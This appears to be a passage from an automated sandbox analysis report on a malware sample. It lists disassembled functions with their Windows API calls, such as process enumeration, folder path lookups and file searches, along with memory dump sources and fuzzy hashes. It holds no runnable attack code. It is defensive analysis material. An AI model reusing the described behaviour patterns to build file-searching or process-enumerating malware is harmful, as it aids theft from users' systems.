                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: f3f299f2cc736a14aa76854034281fd3896a792cf7fc4ac7e5ae64edb0e99ce0
                        • Instruction ID: 2d65de37593a3959aec048c761919a70cc196013e48ab68a63c1b5a6ddbc8948
                        • Opcode Fuzzy Hash: f3f299f2cc736a14aa76854034281fd3896a792cf7fc4ac7e5ae64edb0e99ce0
                        • Instruction Fuzzy Hash: 64316B71912358ABDB65DF92CC81FEEB77AEB44700F10419DF10AA21A0EB306E45CFA5
                        Function 006E7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006F0E00,00000000,?), ref: 006E79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,006F0E00,00000000,?), ref: 006E79C4
                        • wsprintfA.USER32 ref: 006E79F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 668acbd425924366358a90c881f126d263869eec05a3d9551b32451b82f4cc9d
                        • Instruction ID: f0d09040487899952a32fd80c845bcae6c2eb059e1ee54879d0b61f1d7467b95
                        • Opcode Fuzzy Hash: 668acbd425924366358a90c881f126d263869eec05a3d9551b32451b82f4cc9d
                        • Instruction Fuzzy Hash: AA112AB2A19118ABCB14DFCADD45BFEB7F8FB4CB11F10425AF605A2280E2395940D7B1
                        Function 006EC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 006EC74E
                          • Part of subcall function 006EBF9F: __amsg_exit.LIBCMT ref: 006EBFAF
                        • __getptd.LIBCMT ref: 006EC765
                        • __amsg_exit.LIBCMT ref: 006EC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 006EC797
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 3da7c92f7d12e9ac2b8e438e33024c457f39d726f4aab065f84ed1da2dc95e3b
                        • Instruction ID: dd4b39f02b441be28214681587bea6647493bd010ed854e5f8de7dda543a2b73
                        • Opcode Fuzzy Hash: 3da7c92f7d12e9ac2b8e438e33024c457f39d726f4aab065f84ed1da2dc95e3b
                        • Instruction Fuzzy Hash: 39F096329037949BDBA0BFBA9806B9E33A36F00735F21514DF404A62D2CB645942DE5E
                        Function 006E4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4F7A
                        • lstrcat.KERNEL32(?,006F1070), ref: 006E4F97
                        • lstrcat.KERNEL32(?,00E49258), ref: 006E4FAB
                        • lstrcat.KERNEL32(?,006F1074), ref: 006E4FBD
                          • Part of subcall function 006E4910: wsprintfA.USER32 ref: 006E492C
                          • Part of subcall function 006E4910: FindFirstFileA.KERNEL32(?,?), ref: 006E4943
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F0FDC), ref: 006E4971
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F0FE0), ref: 006E4987
                          • Part of subcall function 006E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006E4B7D
                          • Part of subcall function 006E4910: FindClose.KERNEL32(000000FF), ref: 006E4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 3b1064b01646b948b7a2d0b291500b465781b9a9e9481e26ce432f5738a0e2fb
                        • Instruction ID: d8764edbdc2a77690eaaafcffcdfb1113beecee54ffcda460dd5cc58cba0643b
                        • Opcode Fuzzy Hash: 3b1064b01646b948b7a2d0b291500b465781b9a9e9481e26ce432f5738a0e2fb
                        • Instruction Fuzzy Hash: 3A21FDB6A153086BC754F7B0DC46EED333EA754300F008548B65957182EE749EC9CB96